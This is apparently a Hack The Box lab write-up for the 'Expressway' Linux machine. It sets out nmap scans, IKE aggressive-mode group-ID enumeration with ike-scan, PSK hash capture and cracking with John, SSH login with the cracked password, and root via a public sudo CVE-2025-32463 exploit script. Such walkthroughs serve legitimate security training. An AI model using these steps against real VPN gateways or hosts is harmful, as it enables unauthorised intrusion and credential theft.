Hack The Box / LINUX / 2026-03-07

Hack The Box — Expressway (Linux)

IKE/IPsec enumeration reveals a valid group ID and PSK, cracking gives SSH access as ike, and sudo CVE-2025-32463 leads to root.

Target

Target IP: 10.129.166.223

Port scan

sudo nmap -sC -sV 10.129.166.223 -p- -v -T5

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

sudo nmap -sU 10.129.166.223 -p- -v --min-rate 10000

PORT    STATE SERVICE
500/udp open  isakmp

sudo nmap -sC -sV -sU 10.129.166.223 -p500 -v

PORT    STATE SERVICE VERSION
500/udp open  isakmp?
| ike-version:
|   attributes:
|     XAUTH
|_    Dead Peer Detection v1.0

Useful site: https://book.hacktricks.wiki/en/network-services-pentesting/ipsec-ike-vpn-pentesting.html?highlight=port%20500

IKE enumeration

ike-scan 10.129.166.223

Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.166.223  Main Mode Handshake returned HDR=(CKY-R=104824470b6ae834) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.039 seconds (25.35 hosts/sec).  1 returned handshake; 0 returned notify

ike-scan -M --showbackoff 10.129.166.223

Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.166.223  Main Mode Handshake returned
        HDR=(CKY-R=82d45f7483b9be1a)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

IKE Backoff Patterns:

IP Address      No.     Recv time               Delta Time
10.129.166.223  1       1758149238.004359       0.000000
10.129.166.223  Implementation guess: Linksys Etherfast

Ending ike-scan 1.9.6: 1 hosts scanned in 61.376 seconds (0.02 hosts/sec).  1 returned handshake; 0 returned notify

wget https://book.hacktricks.wiki/en/files/vpnIDs.txt
while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line 10.129.166.223) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < ./vpnIDs.txt

Found ID: GroupVPN
Found ID: Group-VPN
Found ID: EZ
Found ID: ez
Found ID: 3000

ike-scan -M -A -n GroupVPN --pskcrack=hash.txt 10.129.166.223

Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.166.223  Aggressive Mode Handshake returned
        HDR=(CKY-R=3e20508de12f19fd)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.121 seconds (8.26 hosts/sec).  1 returned handshake; 0 returned notify

We can see ike@expressway.htb. ike might be a username.

cat hash.txt

eb83c09f8f1c853fa288fbc186b5a319c3c24447cbfe5b8de93c519ee3a54084e1149368ff25fba7623e5a60ff1caa8f4d8a44650ae087d2f577a662d7997a6aa72d3aa179800ef2bbcc4b9f07e704c3c679c3df2e42c2203eb467c4bdf8f12dbbd42e7253008e205a1a4cd8d3c72c5d3ae96278257abbf903b079945a8f0e13:5771aad2be94025a3b0fb166e9dbdd246f45112a7cdf1539bda6d5bfd97a5e1ef3cfa2dd81a729ade087b403e8a753eec8de7a3bd7156fa4d9a0b8a5a8593d2d1aaf6a30784c5fbb97790070a56a6c7b5958d5c6f693dee728ac73c860a8fa31cb0dee53453685ee5cf29801169b919126f85201879cb2d6c6266399ae524d47:3e20508de12f19fd:066399c30c98556d:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:32d235e8911f2a3322daffb00a0dbef14fb45a4c:3150c16383fca7c5f8ac9c19e481e1f5f0dee355d84ec162827796e415e72356:bb9f205ae2e1a472d752102038c8702345ca5e69

ikescan2john hash.txt

$ike$*0*eb83c09f8f1c853fa288fbc186b5a319c3c24447cbfe5b8de93c519ee3a54084e1149368ff25fba7623e5a60ff1caa8f4d8a44650ae087d2f577a662d7997a6aa72d3aa179800ef2bbcc4b9f07e704c3c679c3df2e42c2203eb467c4bdf8f12dbbd42e7253008e205a1a4cd8d3c72c5d3ae96278257abbf903b079945a8f0e13*5771aad2be94025a3b0fb166e9dbdd246f45112a7cdf1539bda6d5bfd97a5e1ef3cfa2dd81a729ade087b403e8a753eec8de7a3bd7156fa4d9a0b8a5a8593d2d1aaf6a30784c5fbb97790070a56a6c7b5958d5c6f693dee728ac73c860a8fa31cb0dee53453685ee5cf29801169b919126f85201879cb2d6c6266399ae524d47*3e20508de12f19fd*066399c30c98556d*00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080*03000000696b6540657870726573737761792e687462*32d235e8911f2a3322daffb00a0dbef14fb45a4c*3150c16383fca7c5f8ac9c19e481e1f5f0dee355d84ec162827796e415e72356*bb9f205ae2e1a472d752102038c8702345ca5e69

Put it into a file named hash.

./john/run/john --wordlist=./rockyou.txt ./hash

Recovered password:

freakingrockstarontheroad

Initial access

ssh ike@10.129.166.223

Enter password:

freakingrockstarontheroad

We get a shell.

sudo --version

Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

Privilege escalation

There is a vulnerability (CVE-2025-32463) with an exploit: https://github.com/pr0v3rbs/CVE-2025-32463_chwoot

Upload the sudo-chwoot.sh file from that repository to the victim machine.

chmod +x sudo-chwoot.sh
./sudo-chwoot.sh

We get a shell as root.